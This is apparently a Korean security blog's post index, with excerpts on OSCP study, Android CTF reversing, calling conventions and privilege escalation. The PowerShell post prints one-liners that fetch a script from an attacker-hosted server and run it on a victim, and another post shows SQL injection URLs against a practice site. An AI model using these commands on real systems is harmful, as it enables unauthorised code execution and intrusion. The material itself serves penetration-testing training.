OSCP 후기 1차 시험 불합격 1200불 순삭 1. Course 자료만 열심히 공부한다고 붙을 수 있는 시험이 아니다. -_ㅜ 2. 머신이 랜덤으로 배정되기 때문에 운이 따라줘야한다 3. 구글링과 payload 커스터마이징, 트러블슈팅, 시간관리 충분히 연습해둘 것. 4. 스크립트에만 의존하지 말자. 수작업 명령어가 더 빠르고 정확할 수 있다. 5. 24시간동안 풀도록 시간끌만한 함정들이 존재하니 사소한 부분이라도 놓치지 말자 ^^ OSCP/시험대비 2020.07.30
[WIKIBOOKS] Calling Conventions https://ko.wikipedia.org/wiki/X86_%ED%98%B8%EC%B6%9C_%EA%B7%9C%EC%95%BD https://en.wikibooks.org/wiki/X86_Disassembly/Calling_Conventions Calling Conventions 정리 매개변수 스택 순서: 오른쪽->왼쪽 cdecl: caller가 스택정리 stdcall: winAPI, callee가 스택정리 thiscall: ecx에 this포인터 저장 (주의할 점은 컴파일러마다 this 포인터를 어떤 레지스터에 담을지가 다르다.) 매개변수 저장 순서: rcx,rdx,r8,r9,스택 (MS x64) fastcall: 64비트 아키텍쳐, callee가 스택정리 매개변수 저장 순서: RDI, RSI, RD.. Windows 2020.07.30
[MOBISEC] Pincode (10) Pincode (10) MainActivity 메인엑티비티를 분석해보면 Pinchecker.checkPin() 매소드에서 Pin번호를 검증한다. 올바른 Pincode를 입력할 경우 검증 과정에서 사용되는 매소드들이 True가 계속 반환되며 화살표 순으로 진행된다. 그리고 최종적으로 서버와의 통신을 통해 Flag를 반환받을 수 있다. 핵심 로직은 Pincheck.checkPin() 매소드를 분석해보자. PinChecker.checkPin() PinChecker클래스의 checkPin 매소들를 분석해보면 Pin은 6글자이고 MD5로 다이제스트한 값이 "d04988522ddfed3133cc24fb6924eae9"과 동일해야한다는 것을 알 수 있다. 6글자의 숫자이기 때문에 브루트포스로 충분히 찾아낼 수 있겠다.. 리버싱CTF/mobisec 2020.07.26
[MOBISEC] BabyRev (10) MOBISEC babyrev (10) Jadx-gui를 이용해서 APK파일을 디스어셈블한다. MainActivity 분석 다음과 같은 코드를 사용하면 ID를 지정하고 리소스에 매핑된 문자열을 불러올 수 있다. 아래 필드를 따라가보면 ID넘버가 존재하며 이 ID넘버와 매핑되는 값을 strings.xml에서 찾는다. 개발에 대한 자세한 내용은 아래에 정리한 부록1을 참고한다. final EditText flagWidget = (EditText) findViewById(C0055R.C0057id.flag); final TextView resultWidget = (TextView) findViewById(C0055R.C0057id.result); 아래의 조건문에 맞는 문자열이 이 문제의 Flag값이라는 것을 알.. 리버싱CTF/mobisec 2020.07.25
Manual SQL Injection for OSCP Error based SQL Injection 에러 백터 체크 ' http://testphp.vulnweb.com/listproducts.php?cat=1 컬럼 Enumeration order by 명령 12개에서 에러가 발생하므로 컬럼수 는 11개 http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+11-- http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+12-- 출력 위치 파악 * 어떤 웹 어플리케이션의 경우, 파라미터 값이 -1 등 범위를 벗어난 값이 입력되야 출력되는 경우도 있다. 2하고 7 그리고 9가 화면에 출력 됨 http://testphp.vulnweb.com/listproduct.. OSCP/시험대비 2020.07.22
[SPIKE] Vulnserver.exe OSCP를 공부함에 있어 해결되지 않은 개념을 정리하기 위해 작성하였습니다. OSCP 버퍼오버플로우 부분을 공부 하던 중 Vulnserver.exe를 트리거 하기 위해 구성된 페이로드는 어떻게 발견되었으며 왜 이런식으로 구성된건지 의문이 들었다. 아래 블로그와 URL에서 그 궁금증을 해결할 수 있었다. http://sh3llc0d3r.com/vulnserver-fuzzing-with-spike/ https://resources.infosecinstitute.com/intro-to-fuzzing/#gref 이 포스팅은 위 URL을 실습 후 정리한 내용입니다. 더 자세한 사항을 공부하고 싶으시면 URL을 참고해주세요. Vulnserver.exe - 보안연구원들의 버퍼오버플로우 학습을 위해 실습용으로 제작된 .. Fuzzing 2020.07.19
Enumeration for Escalation 스크립트 비교 (bat, exe, sh) winPEAS 1. bat vs exe bat파일은 exe파일보다 훨씬 많은 Enumeration을 제공함, 단점: 오래걸린다. exe파일은 컬러를 활용해 취약 부분을 표시해주므로 가식성이 좋다, 단점: 미탐이 존재한다. =>결론: 둘다 사용하자. 2. x64 vs x64 x86 실행파일은 x64에서 실행이 되지만 실행 파일에 대한 권한체크 부분이 미흡했다. =>결론: 아키텍쳐에 맞는 실행파일을 실행하자. LinEnum.sh vs LinPEAS.sh linEnum.sh: 빠르지만 linPEAS보다 상대적으로 수준이 낮음 linPEAS.sh: 컬러, 디테일한 체크, 서버 파일이 너무 많을 경우 대기 상태가 길어질 수 있음 Linprivchecker.py: 빠르지만 가식성이 안좋음, 파이썬이 설치되어 있어야.. OSCP/시험대비 2020.07.17
Manual Privilege Escalation https://www.netsecfocus.com/oscp/2019/03/29/The_Journey_to_Try_Harder-_TJNulls_Preparation_Guide_for_PWK_OSCP.html https://herrfeder.github.io/pentesting/2018/09/30/OSCP-Cheat-Sheet.html https://www.gitbook.com/book/sushant747/total-oscp-guide sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html blog.g.. OSCP/시험대비 2020.07.15
파워 쉘 for 침투테스트-2 http://virgil-cj.blogspot.com/2018/02/escalation-time.html These one-liners download the script from your webserver and run it directly on the victim machine. c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://192.168.1.2:8000/PowerUp.ps1') ; Invoke-AllChecks" c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://1.. OSCP/시험대비 2020.07.15
[Linux] Lord of the Ring CTF스타일이라 헬난이도였다... - base64 두번 인코딩, 포트노킹, sqlmap, drib? - ip:1337 - ip:22 kernel linux 3.19.0-25-generic UBUNTU 14.04.3 LTS 104.04 커널 외 루트 익스플로잇 방법이 두가지가 더 있음 HTM이 의도한건 오버플로우 권한상승. https://barnyserver.com/ctf/2018/03/ctf-lord-of-the-root-1-0-1/ OSCP/TryHackMe 2020.07.14